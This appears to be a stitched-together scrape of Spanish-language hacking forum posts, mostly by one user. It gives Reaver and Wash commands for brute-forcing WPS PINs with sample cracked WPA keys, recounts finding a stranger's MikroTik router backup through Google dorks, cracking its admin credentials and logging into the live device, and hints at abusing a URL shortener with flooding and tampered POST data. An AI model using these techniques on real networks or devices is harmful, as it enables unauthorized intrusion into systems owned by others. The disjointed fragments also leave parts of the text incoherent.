Excelente aporte! muchas gracias!!!


solamente le agregarìa un poco de port knocking y sobre todo el cambio del puerto que nombra el articulo es indispensable.. algo tan sencillo evitar muchisimos problemas a la hora de recibir ataques de fuerza bruta o escaneos masivos sobre el servicio sshd!

gracias!!

Gracias amigos, un placer compartirlo con ustedes y que sea bien recibido!!

aqui les dejo la url del dork!!

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta




TROLL!

xD!!!

saludos amigo F0m3T

ok! suerte!!

a mi me funciona de maravillas!

reaver rules ! 

Google Dorks ad by me  on No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Google dorks agregado por mi en No tienes permitido ver los links. Registrarse o Entrar a mi cuenta !!! yeah!!




i'm happy !!   

jajajaja! gracias Harkonnen!!

saludos!

No te olvides de los chipsets soportados:

es casi seguro que algo se te está pasando 


aqui te adjunto los chipsets soportados por REAVER:

Supported
The following wireless drivers have been tested or reported to work successfully with Reaver:

ath9k
rtl8187
carl19170
ipw2000
rt2800pci
rt73usb
Partially Supported
The following wireless drivers have had mixed success, and may or may not work depending on your wireless card (i.e., if you are having problems with these drivers/cards, consider trying a new card before submitting a trouble ticket):

ath5k
iwlagn
rtl2800usb (using the latest compat-wireless drivers has fixed many user's problems, hint hint...)
b43
Not Supported
The following wireless drivers/cards have been tested or reported to not work properly with Reaver:

iwl4965
RT3070L
Netgear WG111v3

saludos!

kn0w13dg3 

Gracias CrazyKade, es un placer poder compartirlo con todos ustedes!

saludos!!

Buenas amigo!

Recordá que no todos los aps son vulnerables a REAVER!!!

Te recomiendo que antes useas Walsh, para ver si es vulnerable y luego corras reaver.

Walsh v1.3

Required Arguments:
-i, --interface=<iface> Interface to capture packets on
-f, --file [FILE1 FILE2 FILE3 ...] Read packets from capture files

Optional Arguments:
-c, --channel=<num> Channel to listen on [auto]
-o, --out-file=<file> Write data to file
-n, --probes=<num> Maximum number of probes to send to each AP in scan mode [15]
-C, --ignore-fcs Ignore frame checksum errors
-5, --5ghz Use 5GHz 802.11 channels
-s, --scan Use scan mode
-u, --survey Use survey mode [default]
-h, --help Show help

Ejemplo de uso: walsh -i mon0 (actualmente sería wash -i mon0)

Scanning for supported APs...

00:19:15:XXXXXXXX WLAN_5XXX
00:19:15:XXXXXXXX WLAN_3XXX
X0:21:B7:XXXXXXXX XXXXXXXXX
64:68:0C:XXXXXXXX WLAN_XXXX
C4:3D:C7:XXXXXXXX ONOXXX

lo parás con control+c

2.- reaver: Sirve para lanzar los PINS e ir probando. Puede llegar a tardar muchas horas (como 11 que tardé yo, por ejemplo)

Uso: reaver -i mon0 -b C4:3D:C7:XXXXXXXX -vv

Resultado

94.67% complete @ 2012-01-08 08:34:36 (4 seconds/attempt)
WPS PIN: '5XXXXXXX'
WPA PSK: '1XXXXXXXXX'
AP SSID: 'ONOXXXX'

Recorda que solo funciona en AP's con WPS activado!


Saludos amigo!

Kn0w13dg3 

BIENVENIDO!! 

  Asi quedó mi cara despues de meter mis narices en esta cuestión...

Ante todo, "hola" (que caballero soy..) 

Todo comenzó un día cuando estaba certificando MTCNA de mikrotik, y el certificador al final de una de las clases dijo lo siguiente: "No pierdan sus archivos de backups, porque sino será imposible recuperar las claves de admin".... lo primero que pensé es..  esto será cierto?

Comenzó como una inquietud y decidí accionar al respecto:  (uhh que tipo accionador que soy..    )

Primero: Necesitaba un archivo de backup.. pero como siempre me ha gustado usar las cosas ajenas de la gente y no las mias.. (shhh, no lo repartan..)..
decidi buscar alguno en don google.. pero.. existirá alguien tan estupido como para  subir un archivo de backup de su router Mikrotik a internet?
La respuesta es un : SI, SEÑOR!! (asi como en la milicia..)

usando un par de google dorks... aparecíó lo siguiente: 



Una vez obtenido el archivo de backup, decidi echarle un vistazo como un hexeditor y encontré lo siguiente:



Yes!!! usuario y clave de changeip.... y bueno, veamos que hay dentro!! 



Ahá! efectivamente es un Mikrotik, y está activo  (ping).............

MMm.. con toda esta info ya me dan ganas de entrar a este misterioso equipo... pero.. no tengo las claves? como hago?

Claro!!!  pero tengo el archivo de BACKUP!

A crackear amigos!  ---> buscando por ahi me encuentro con ésta web... "No tienes permitido ver los links. Registrarse o Entrar a mi cuenta", la cual nos da las credenciales haciendo un upload desde un archivo de backup!!



OHHHH my god!! (grito asi estilo pelicula xxx..) ...     ya tengo las credenciales.. : Admin ven a mi!!... solo me queda probar si esto funciona... en 3,2,1.. kboom!!



me encanta cuando sale: logged in!!!   

Yes! Estoy dentro, y miren que cosas tan interesantes mas hay... passwords de tuneles (backdoor? ha!) , maquinas para pivotear... además de que el admin usó las mismas claves para unas 10 maquinas mas enlazadas desde ese router via wireless y vpn con mikrotik...


Espero lo hayan disfrutado, y ahora repitan tras de mi el siguiente juramento:

                      "NO SUBIRÉ A INTERNET MIS ARCHIVOS DE BACKUP DE MI ROUTER MIKROTIK..."    amén!


Hasta la próxima!

Saludos mi gente!


Kn0w13dg3   

Buenas gente!


Jugueteando por ahi, entré por otra cuestión en un url shortener para acortar una dirección.. lo loco es que se me apareció el demonio y al oido me dijo.. que pasa si intentás hacer esto?:

url: bit.do  --- servicio url shortener
action: simplemente use un poco de flood connect y cambie algunos parametros en el POST con un tamper data..
resultado: algo siniestro...





if i kn0w you.. is because i see you..

saludos gente!

Excelente, gracias!

Excelente aporte!!! gracias!

Excelente aporte, cabe destacar la facilidad de implementar pptp, pero en cuanto a seguridad, deja mucha que desear. Alternativas como OpenVPN nos hacen la vida mas segura.

Saludos!